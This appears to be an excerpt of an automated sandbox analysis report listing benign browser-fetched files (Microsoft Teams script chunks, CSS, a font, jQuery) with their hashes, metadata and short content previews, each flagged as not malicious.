                                                                                                                                                                                                                          MD5:0A6903B0C0DCC547CA7FA6AFEC635D78
                                                                                                                                                                                                                          SHA1:D63E014794AC8D7BEDEA72C6FEDA13FBD08E989B
                                                                                                                                                                                                                          SHA-256:1494A9B97D2E7F5DE852399FEE596954A438792BAFBA1480CCA60F45FF293177
                                                                                                                                                                                                                          SHA-512:7C07F4C0815C694E8C62D799A60EA0E9ABFBE488A08EB8F48C7AE4CF5C0D26A1839D3747497E2A4474860191F6C6213110799568B37AE48D7EF998A91957CA5B
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/336776-ea71e5cdee4549c4.js
                                                                                                                                                                                                                          Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[336776],{911717:(e,t,n)=>{"use strict";n.d(t,{w:()=>a});var r=n(783148);class a{constructor(e,t){this.value=e,this.piiKind=t}static isPIIValue(e){return!!e&&"string"!=typeof e&&void 0!==e.scrub}scrub(){return(0,r.sha256)(JSON.stringify(this.value))}}},276201:(e,t,n)=>{"use strict";n.d(t,{$:()=>a});var r=n(34655);function a(e){if(!e||"object"!=typeof e)return!1;if("RegionGtmNotFoundInRespone"===e.errorCode)return!0;const t=e;return t.code===r.O4.InvalidResponse&&"Discover"===t.context&&"regionGtm"===t.subContext}},396949:(e,t,n)=>{"use strict";var r,a;n.d(t,{I:()=>r}),function(e){e[e.BT_STOP=0]="BT_STOP",e[e.BT_STOP_BASE=1]="BT_STOP_BASE",e[e.BT_BOOL=2]="BT_BOOL",e[e.BT_UINT8=3]="BT_UINT8",e[e.BT_UINT16=4]="BT_UINT16",e[e.BT_UINT32=5]="BT_UINT32",e[e.BT_UINT64=6]="BT_UINT64",e[e.BT_FLOAT=7]="BT_FLOAT",e[e.BT_DOUBLE=8]="BT_DOUBLE",e[e.BT_STRING=9]="BT_STRING",e[e.BT_STRUCT=10]="BT_STRUCT",e
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):308700
                                                                                                                                                                                                                          Entropy (8bit):5.404998924415669
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:6144:PD2jvR4qOq5oiqbc2mV5DFzepcmuojhIiZMk5RnJRP:PD2jvR4qOq5oiqbc285DF8cmumhIiZp/
                                                                                                                                                                                                                          MD5:DACD89FC50E6474F44A8DE8D7B2BAA40
                                                                                                                                                                                                                          SHA1:211FC3DF4F70006451934E30C04F88D057672584
                                                                                                                                                                                                                          SHA-256:E2F76883458C57E612B2385D460E44E270AC1E49EEA1117989BA0FE360B869A6
                                                                                                                                                                                                                          SHA-512:354580B843BF4B319332D858706C63ADBFA0AD4E9ABC1F03961D9E3C1096E953EBC51C6B81D397E77F90AA4881994F898E7BB53BC4D10BB814BF26A60563F08D
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[931067],{292051:(e,r,o)=>{o.d(r,{f:()=>a});var a=function(){return{attributes:{root:{role:"cell"}}}}},542814:(e,r,o)=>{o.d(r,{F:()=>n});var a=o(292051),t=function(){return{attributes:{root:{role:"columnheader"}}}},n=function(e){return{attributes:{root:{role:"row"}},childBehaviors:{cell:e.header?t:a.f}}}},453766:(e,r,o)=>{o.d(r,{J:()=>n});var a=o(888846),t=o(698099),n=function(){return{attributes:{root:{role:"toolbar"}},focusZone:{props:{shouldFocusInnerElementWhenReceivedFocus:!0,direction:a.E.bidirectionalDomOrder}},childBehaviors:{item:t.i}}}},698099:(e,r,o)=>{o.d(r,{i:()=>n});var a=o(953543),t=o(504405),n=function(e){var r;return{attributes:{wrapper:{role:"presentation"},root:(r={role:"button",tabIndex:0,"aria-haspopup":e.hasMenu?"true":void 0,"aria-disabled":e.disabled,"aria-label":e["aria-label"],"aria-labelledby":e["aria-labelledby"],"aria-describedby":e["aria-described
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):61
                                                                                                                                                                                                                          Entropy (8bit):3.990210155325004
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                                                                                                                                                                                          MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                                                                                                                                                                                          SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                                                                                                                                                                                          SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                                                                                                                                                                                          SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):1369479
                                                                                                                                                                                                                          Entropy (8bit):5.709861414101588
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:24576:talW5XRu/Ztmr+loI7Dxv1vQyQ3MvWMTRk8E3w/QMnLC8Sg6ygR4PPCFYTTSG2/l:talW5XRu/Ztmr+1TRkaQMnLC8Sg6ygRV
                                                                                                                                                                                                                          MD5:091C2714125D00617A346EAB795C0F52
                                                                                                                                                                                                                          SHA1:43A14735774B3D6DB05299B1E21EF96A42D6085B
                                                                                                                                                                                                                          SHA-256:1E4A6599B96B2506239551A3DAC5D3B54FF673CD88393C434BEF5ECE55B9AD63
                                                                                                                                                                                                                          SHA-512:6B14EE4461BA8AFFB7325C2821B7582E501599131A931DC3F9960D4D0FC9D14ABE14F528E29E31ABBC465132C05E4EF42B8B9677495B628F54B8D05F372E8C4C
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/griffel-e216e39f0b9c6ed0.css
                                                                                                                                                                                                                          Preview:.r1sgsif7{outline:2px solid var(--colorPaletteNavyBorderActive);}.ru42dn6{outline:2px solid var(--colorStatusDangerBackground3);}.rc5rb6b{list-style-type:none;display:flex;align-items:center;margin:0;padding:0;}.r1tl60rs{display:flex;align-items:center;color:var(--colorNeutralForeground2);box-sizing:border-box;text-wrap:nowrap;}.rk008qs{display:flex;}.rxqbxwz{color:inherit;font-family:inherit;padding:0px;border-style:none;-webkit-appearance:button;-moz-appearance:button;appearance:button;text-align:unset;background-color:transparent;display:flex;height:100%;align-items:center;border:var(--strokeWidthThin) solid var(--colorTransparentStroke);border-left-color:var(--colorNeutralStroke1);border-top-left-radius:var(--borderRadiusNone);border-bottom-left-radius:var(--borderRadiusNone);}.rxqbxwz[data-fui-focus-visible]{outline:var(--strokeWidthThick) solid var(--colorStrokeFocus2);}.rdjx360{color:inherit;font-family:inherit;padding:0px;border-style:none;-webkit-appearance:button;-moz-appeara
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:Web Open Font Format (Version 2), TrueType, length 18500, version 1.0
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):18500
                                                                                                                                                                                                                          Entropy (8bit):7.989500817921123
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:384:IUJdn4+badWw0HC6S1IzpEn7jjdaPGNDcOobkrz8hV1lnDES+IOw:BDbLw76fz6nJaPGNDsb+8hFDEkOw
                                                                                                                                                                                                                          MD5:4868DD20C7C64A087DDE7426200C3C0E
                                                                                                                                                                                                                          SHA1:602F24BCF3A112718917140E1F605BC6C2D2A6DC
                                                                                                                                                                                                                          SHA-256:BCB3C99616A6B90084E82690AB8519141A78FEA94C0AB3A3A5CA7611C0D77E4C
                                                                                                                                                                                                                          SHA-512:72326C1F86BCC9A2A1CF73B9DBE07B00327CF5442E163F1CA74251EAC1449E7ED4CD0159475FEE300AF0A9BC29093EB63411813F62987A4C779D5C1767928E6D
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://img1.wsimg.com/gfonts/s/muli/v29/7Aulp_0qiz-aVz7u3PJLcUMYOFnOkEk30eg.woff2
                                                                                                                                                                                                                          Preview:wOF2......HD..........G..............................F..(.`?STATD..............p.....&..6.$..H. ..X..[..K.............X.....aasG!.q..._B...9Ie.M.O[A.9...r8..,'..,.<qV...E%..c.e......=...l.0tX.B...q....^.6.mJ$Bg......J...3.Mu...s.....i.a......X..P..?.....-......-T..~E `6..Z..=7nQE...fk.;..F.$'/.Or.W.t...;kF`d ........y...w.G.U.N..D...FE..SD.@{...J...\......... .(.f..2...J.... A.!I...t..K.+]T.._....i<....G.r....$..m...t..A.B_.QG.....3P...v.^...E....+....N8z..[.%.1...+......x..{.........t....VW=...4..e.._.L.......t_n_U...Jf...........I..78..#..?.6.i..:....<.7dr...|..yK.G6.2 }.."Y&i.A.=.....Q..".bK2b...D*.N..2......)S.D...r@o..e*..6..q..\......IJ.aI..........pFt8ifw...=.<.......w.>....P..,Y&-[...>%'..<.%...)yRVp..?.K......n.&V.).[....-..^PA!..u...T.f...>..y..lsk0..}`?fIK...zs.7.7`1....b.J ..e.Ts.v..AE..h...kw..Kr...p..""%H&!..D..s.]h...7D.!!.x{X.1......H.Q&....}..~I*.9.3......AX........@t.@.....A... 4...b&....Rc.d.Q0]. ..\............9.`.n....S.j2.
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):221
                                                                                                                                                                                                                          Entropy (8bit):5.32955468303281
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:6:FSPD8WUDDSBSyFbNemGHr9EJiKWaEwI8WUDDn:c5UDGBSyCTHr+pWTwGUDr
                                                                                                                                                                                                                          MD5:8F12765EB30FBDCFCDC116D13F7FC272
                                                                                                                                                                                                                          SHA1:506E45B7D3930756EACCE0DAD449A3C8CDB3EAC6
                                                                                                                                                                                                                          SHA-256:265995EB76326E95613750F6F6570B850F5C22280D262DE9B9632A16CEB98B9B
                                                                                                                                                                                                                          SHA-512:7AA2F396B105BCCF2B943FD2AC60929D8BF3A0EB8574B77451CB29816DF8ACDCD07694B526D7E4585F849DFDA3A0FE6E95661179E13F682DBF54098D98154BFB
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:define("@widget/LAYOUT/c/bs-navigationDrawer-27f5f1f5.js",["exports"],(function(i){"use strict";i.N="-249vw"})),"undefined"!=typeof window&&(window.global=window);.//# sourceMappingURL=bs-navigationDrawer-27f5f1f5.js.map.
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):162009
                                                                                                                                                                                                                          Entropy (8bit):5.074837765032432
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:3072:F9Qax3fp52cF45QzZbQObIxVkCeVfNdkNEmmhDI:F9QyfpocF45QzZbQxTeVfNdEEzDI
                                                                                                                                                                                                                          MD5:B1E4A13B68EEF590317AC2C27D5CEF27
                                                                                                                                                                                                                          SHA1:13AFE7905A46EC9E27150423F2C0CE0C90923E2E
                                                                                                                                                                                                                          SHA-256:C25D8632D4D9B961B2D3E73C3B912C28D096B43223D64A2A9444E5BF345E56DE
                                                                                                                                                                                                                          SHA-512:FF302040565F5907567661184A4C854393269E960AA0926EB041236ACA954223E9CE643CEC66CCA2E016569503C1BCF8E2AA0B9FF4C9F9E5C32F03F926D8A68C
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/876152-9b16060b7960d27c.js
                                                                                                                                                                                                                          Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[876152],{876152:e=>{e.exports=[{types:{ModelDirectiveScope:[5,["SERVER_RESOLVERS","BROWSER_RESOLVERS","CLIENT_RESOLVERS"]],DisplayWaterMark:[5,["On","Off","Fade"]],CommunityNotificationSettings:[2,{id:10,inviteOnNetworkEmailOptIn:2,announcementEmailOptIn:2}],HardwareOutDevice:[2,{id:10,description:6,isAvailable:7,callId:5,participantId:5,localStream:2,participantStreamId:3,videoType:"StreamType",format:1,formats:11,participantDisplayName:1}],PtzControlCommand:[5,["Reset","ZoomIn","ZoomOut","PanLeft","PanRight","TiltUp","TiltDown"]],TranscriptEditType:[5,["Speaker"]],TranscriptDownloadFormat:[5,["Vtt","Docx","Pdf"]],DriveRecipientInput:[6,{email:1,alias:1,objectId:1}],LinkScopeInput:[5,["anonymous","organization","users","existingAccess"]],LinkTypeInput:[5,["view","edit"]],CreateShareLinkOptions:[6,{deferRedeemEnabled:7,partialSuccessEnabled:7}],PptSharingContentInput:[6,{id:10,name:6,type
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (65479)
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):359804
                                                                                                                                                                                                                          Entropy (8bit):5.928198594246381
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:6144:I8SCaXo5VE5qPaghGP9PGMtUpZZJx1vgLvzrqnLTDSI8QWRQI/uB:IjoO5qPaghGVJtsDP1YLvz0TeI4RQRB
                                                                                                                                                                                                                          MD5:D4BA442D6C0B9E9693F2FFE2EABF24E0
                                                                                                                                                                                                                          SHA1:51A4D9A30317D3E1FCD15F098CF0785EF03E2C83
                                                                                                                                                                                                                          SHA-256:2B06D408FDE428937B1BFC9B0AC6F71A145BD57D56448943E2D9D1B79DDE9C8F
                                                                                                                                                                                                                          SHA-512:46AC420E4C0F37146548C142487CB4C6FB360C8E20E11203670CDEDC8C1A511EAC0BC7806D645EA15587791220CDC55FF726CD7B01191CD5C9442CDDB496E3CD
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:window.__teamsSriHashes = window.__teamsSriHashes || {};.Object.assign(window.__teamsSriHashes, {"253":"sha256-dCHiqHHbT8C54v6xkfBWJOlN4qDwMFHJpfWkbDSMY1I=","304":"sha256-J//Ktvtf9gZAVrJEo4IyxFOJFdIX13HrYBsw84MKZjs=","450":"sha256-ouv3RNGdmdsmy9N5iMOstCZXhW6f6KuOHbHWbPY8IkI=","555":"sha256-1XCNZ4M/VA/Cs3u4YVBW4RmTc7HQPJ1SgO9LNZDEvIE=","563":"sha256-raXXuMyYmSWZXQPzD+XNeAE86PFRjd4Q9vy6YtqBGGw=","693":"sha256-GvVrL7uVpt/8Q8xZj30M05yu7H2cFyk2hnVodDeZuVE=","757":"sha256-eE44F4pLVlEYadEsrIZ4vjkJu3/kIBCnXE70c464NfM=","785":"sha256-ndUNLMoyh/yu1oaMRWfYYOdtJsBtzogJJGB2FT9Xw7w=","818":"sha256-HRQfl5qrrNxSihawrKVl6appBIRSNE+LwsvSW1bgLNc=","906":"sha256-L5gEiGP2s/6usJyzymx28/OI554GDHRFFoa1Zgz27xg=","1079":"sha256-AJb1brTr1NgAtonwrQ7awmQGy7xZxCmmPEjtbTEtBXQ=","1081":"sha256-U9E/bfXdmC09dlSnprdgfmChJBLjtwaHq0ObyMZNOnE=","1170":"sha256-JDhpHtZ6E4OzpC7AkARyf+KbMplq8nJfnZ64M4UwnSQ=","1214":"sha256-FIGgND7SkFJQs87te48T7KbVZ0x5hWUOQPRyJAWo5FU=","1258":"sha256-vZ+JBKqlmK8u03V/tfF86M7gAbjeFWbaZTfqTGaAquE=
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (26062)
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):26168
                                                                                                                                                                                                                          Entropy (8bit):5.296571517037529
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:768:XK0TO27wdekqJ/zJnhWh45hvim95mFADabEUjt7BA:Oe1J/VhWh45hf7Dazjty
                                                                                                                                                                                                                          MD5:A46EFC647DE93EE6A18BD892F4A95BB2
                                                                                                                                                                                                                          SHA1:4FFD23C55B16482BE0AE5A545C0977EC7AC78143
                                                                                                                                                                                                                          SHA-256:2968994431F249465FF67033C9A9A43132B38FE0B982ED7CCF4AF39909604BD6
                                                                                                                                                                                                                          SHA-512:CCA8C183453DDC9D52E1A104248AAA563A988CAEAAEEA4587454E14D45770ED8CA7F878D6177B4E66F18E0ED284127EC73C3C0842E2843ABD9CC547C6BF9C781
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/7747-899d03cb39279d83.js
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[7747],{799323:(e,n,t)=>{t.d(n,{x:()=>a});var r=t(513432),o=function(e){return void 0===e},a=function(e){var n=r.useState(o(e.defaultValue)?e.initialValue:e.defaultValue),t=n[0],a=n[1],i=o(e.value)?t:e.value,l=r.useRef(i);r.useEffect((function(){l.current=i}),[i]);var s=r.useCallback((function(e){l.current="function"==typeof e?e(l.current):e,a(l.current)}),[]);return[i,s]}},783943:(e,n,t)=>{t.d(n,{D:()=>a});var r=t(513432),o=t(338400),a=function(e){var n=r.useRef((function(){throw new Error("Cannot call an event handler while rendering")}));return(0,o.E)((function(){n.current=e}),[e]),r.useCallback((function(){return n.current.apply(void 0,arguments)}),[n])}},182812:(e,n,t)=>{t.d(n,{a:()=>o});var r=t(513432);function o(){for(var e=arguments.length,n=new Array(e),t=0;t<e;t++)n[t]=arguments[t];var o=r.useCallback((function(e){o.current=e;for(var t=0,r=n;t<r.length;t++){var a=r[t
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (22637)
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):22745
                                                                                                                                                                                                                          Entropy (8bit):5.323982641842712
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:384:gxOaUKs4Lk5+4K+oaNlZFe2JgAf4MsehMINWsIpCeG:gxOaG4oNFJgA1skXb
                                                                                                                                                                                                                          MD5:B09B077BA8260002A8EADCD5EB4708B1
                                                                                                                                                                                                                          SHA1:506936BA470B4ADBBC2D737500DCA02496535545
                                                                                                                                                                                                                          SHA-256:377E85D7D26E4F888ECC278631C3362545B51A397CE6E74AAB3F1418DF5F8F7A
                                                                                                                                                                                                                          SHA-512:8E98EB4E1DA92332ABDB9ACBA83B1BF8347080B2C1236300081DB71404599D684A9724FEFCF714A121EBBC82D415E308152E34410791C2D38C4CD52A61D85732
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/725973-6805c0080a1be3a7.js
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[725973],{165451:(e,n,t)=>{t.d(n,{Q:()=>o});var r=t(240364),o=function(e){var n=(0,r.b)(Object.assign({},e,{vertical:!0}));return Object.assign({},n,{attributes:Object.assign({},n.attributes,{root:Object.assign({},n.attributes.root,{disabled:e.disabled,"aria-disabled":e.disabledFocusable})})})}},31007:(e,n,t)=>{t.d(n,{f:()=>C,K:()=>N});var r=t(112882),o=t.n(r),a=t(504405),s=t(382883),i=t(996665),l=t(301078),u=t(390956),c=t(31828),p=t(628266),d=t(152450),m=t(121121),f=t(62600),b=t(513432),v=t(382462),y=t(655008),g=t(278459),C="ui-toolbar__customitem",N=function(){var e=(0,s.A)((function(e,n,t){var r,s=(0,i.P3)(),f=(0,l.J)(t.displayName,s.telemetry),y=f.setStart,C=f.setEnd;y();var N=e.accessibility,P=e.children,h=e.className,k=e.content,I=e.design,O=e.fitted,S=e.focusable,T=e.styles,_=e.variables,w=b.useContext(g.g),E=(0,u.W)(N,{debugName:t.displayName,rtl:s.rtl}),F=(0,c.I)(t.di
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (65447)
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):89501
                                                                                                                                                                                                                          Entropy (8bit):5.289893677458563
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                                                                                                                                                                                          MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                                                                                                                                                                          SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                                                                                                                                                                          SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                                                                                                                                                                          SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://code.jquery.com/jquery-3.6.0.min.js
                                                                                                                                                                                                                          Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (65484), with no line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):127510
                                                                                                                                                                                                                          Entropy (8bit):4.691752397420421
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:1536:2NQAIJqdovv9QFXHpVHWbA+rfQDBmDoGVuQfOm5/Zh8a0q:8QAHdivK1HWbA+rfaBm+Q2mrx
                                                                                                                                                                                                                          MD5:69906B2052917E00F9E22503FDD6FB9C
                                                                                                                                                                                                                          SHA1:751F137E64D2B3944A1670521F1570C799E23A0A
                                                                                                                                                                                                                          SHA-256:122BE606A1B747EB76DDEE11D2D0BC514BAF4629499A36BBA0B761718608A5AE
                                                                                                                                                                                                                          SHA-512:32C950DDEE2B3ED960E62B48D8ED5D2103F10C6E5218C8C946F6E71E1CE28BEEAC032EE484ECEC02C5EB338565DF2CD1DAB949D656747ED8FCFD2D7F3E10DE82
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[316318],{436214:(e,a,t)=>{t.r(a),t.d(a,{default:()=>n});const n={namespace:"teamsAndChannels",locale:"en-us",translations:{activity_goto_team_title:"Go to the team",activity_tab_team_section_header:"Join teams {{firstName}} is active in",activity_tab_team_section_header_unresolved_user:"Join teams this person is active in",actor_reason_string_for_mention_team_or_channel:"{{actor}} mentioned {{channel}}",actor_reason_string_for_team_expire:"{{team_name}} is expiring soon",actor_reason_string_for_team_membership_change:"{{actor}} made you an owner of {{team_name}}",actor_reason_string_for_team_membership_change_in_a_private_or_shared_channel:"{{actor}} made you an owner of a channel",actor_reason_string_for_team_renewal:"{{team_name}} was renewed",add_guest_people_picker_header:"Add {{email}} as a guest?",add_member_close_button_aria_label:"Close",add_member_dialog_member_selec
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (37259)
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):37369
                                                                                                                                                                                                                          Entropy (8bit):5.44186127831047
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:768:RqPw6h3wC/T/oAVf/OoMIYR2YdtqoIwjEWusMkMkMDxqtrV9MjIgUeQJ/6o5mzFf:hdcCtD5vPZLdg
                                                                                                                                                                                                                          MD5:859F0790DACEB74144331047EADDC589
                                                                                                                                                                                                                          SHA1:00B8BA88457C522B90BC3C13DA1A446DAC2B6331
                                                                                                                                                                                                                          SHA-256:754EEDCB935A435F0E2D3A886FA674814B1FA5A9458261EC1D4388BBB12ACB81
                                                                                                                                                                                                                          SHA-512:65CAF9C7062C564E8A598A6C80B7C7F146294E038934E79C736A8364763F8AEB5C138B227F1C68ABA8D45DA676A34BC10DC767432D293AEFA8952F4B58BAB729
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/193021-f13c2dcfbe345db4.js
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[193021],{928380:(e,t,r)=>{var o,n;r.d(t,{sk:()=>o,$n:()=>n,I6:()=>i,Vt:()=>s,UU:()=>a,EJ:()=>c,Rm:()=>l}),function(e){e.CONFIGURATIONS="configurations",e.CONTEXTUAL_NOTIFICATIONS="contextual-notifications",e.END="end",e.HEADER="header",e.IN_APP_NOTIFICATIONS="in-app-notifications",e.MAIN="main",e.MID_NAV="mid-nav",e.MODAL="modal",e.MONITOR="monitor",e.NAV="nav",e.NAV_CONTROLS="nav-controls",e.NOTIFICATIONS="notifications",e.PRE_CACHE="pre-cache",e.START="start",e.SUBNAV="sub-nav",e.TITLE_BAR="title-bar",e.TOASTS="toasts"}(o||(o={})),function(e){e.configurations="configurations",e.contextualNotifications="contextualNotifications",e.end="end",e.header="header",e.inAppNotifications="inAppNotifications",e.main="main",e.midNav="midNav",e.modal="modal",e.monitor="monitor",e.nav="nav",e.navControls="navControls",e.notifications="notifications",e.preCache="preCache",e.start="start",e
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1278)
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):1386
                                                                                                                                                                                                                          Entropy (8bit):5.130362677219664
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:24:wp3sp38qMS7y8FskQhyKFfuR/uEcrW5Wg1vvvySQd+qpeM6km6QPTOYb/d:wp3sp3zMS79s7Ffx65Wg6ekxAr/d
                                                                                                                                                                                                                          MD5:175F9CE0D50E2DE6768A229535D48F23
                                                                                                                                                                                                                          SHA1:E94A55A1B95BB9A565B5B0996922E9D3B1194CC5
                                                                                                                                                                                                                          SHA-256:FCD8450132708D00246BEA0E5C712C2592D553370B5A155C74BD453E850D3B82
                                                                                                                                                                                                                          SHA-512:9B7099CDE88F65E918B973F22959885CA7264881ACE0CA3A7A2D3F76FB3CCAEADCC778C5AE2FBA1A86C00BD22B4953B1EC3DD413544F53ED58ED911022236168
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/618332-82f3e580c26e4cde.js
